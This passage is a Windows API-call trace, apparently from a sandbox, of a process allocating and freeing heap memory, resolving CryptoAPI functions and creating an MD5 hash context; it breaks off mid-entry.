[0251.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0251.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0251.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0251.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0251.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0251.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0251.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0251.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0251.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0251.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0251.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0251.939] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0251.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a88 [0251.939] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69a88, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0251.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0251.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0251.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0251.939] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0251.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0251.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0251.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0251.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ae8 [0251.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0251.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0251.939] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0251.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69988 [0251.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69988, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0251.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0251.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0251.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0251.940] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0251.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0251.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0251.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ae8 | out: hHeap=0x970000) returned 1 [0251.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0251.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0251.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0251.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0251.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0251.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0251.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0251.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0251.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0251.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0251.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0251.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0251.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0251.941] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0251.942] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0251.942] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0251.942] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0251.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0251.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0251.942] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0251.942] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0251.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0251.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0251.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0251.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0251.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0251.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0251.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0251.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0251.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0251.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0251.943] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0251.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0251.943] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0251.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0251.943] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0251.943] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0251.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0251.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0251.943] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0251.943] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0251.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0251.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0251.943] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0251.943] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0251.943] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0251.944] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0251.944] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0251.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0251.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0251.944] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0251.944] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0251.944] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0251.944] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0251.944] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0251.944] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0251.944] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0251.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0251.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0251.944] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0251.945] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0251.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c70 | out: hHeap=0x970000) returned 1 [0251.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0251.945] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0251.945] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0251.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0251.945] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0251.945] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0251.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0251.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0251.945] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0251.945] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0251.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0251.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0251.945] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0251.945] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0251.946] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0251.946] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0251.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0251.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0251.946] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0251.946] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0251.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0251.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0251.946] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0251.946] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0251.946] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0251.946] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51760, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0251.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0251.947] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0251.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0251.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0251.947] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0251.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0251.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0251.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0251.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0251.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0251.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0251.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0251.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0251.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0251.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0251.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0251.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0251.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0251.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0251.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0251.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0251.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0251.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0251.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0251.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0251.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0251.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0251.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0251.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0251.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0251.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0251.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0251.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0251.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0251.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0251.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0251.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0251.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0251.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0251.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0251.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0251.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0251.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0251.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0251.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0251.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0251.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0251.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0251.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0251.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0251.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0251.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0251.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0251.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0251.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0251.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0251.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0251.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0251.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0251.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0251.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0251.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0251.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0251.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0251.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0251.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0251.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0251.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0251.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0251.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0251.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0251.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0251.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0251.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0251.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0251.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0251.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0251.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0251.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0251.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0251.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0251.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0251.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0251.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e563c8 [0251.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0251.950] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0251.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0251.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0251.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 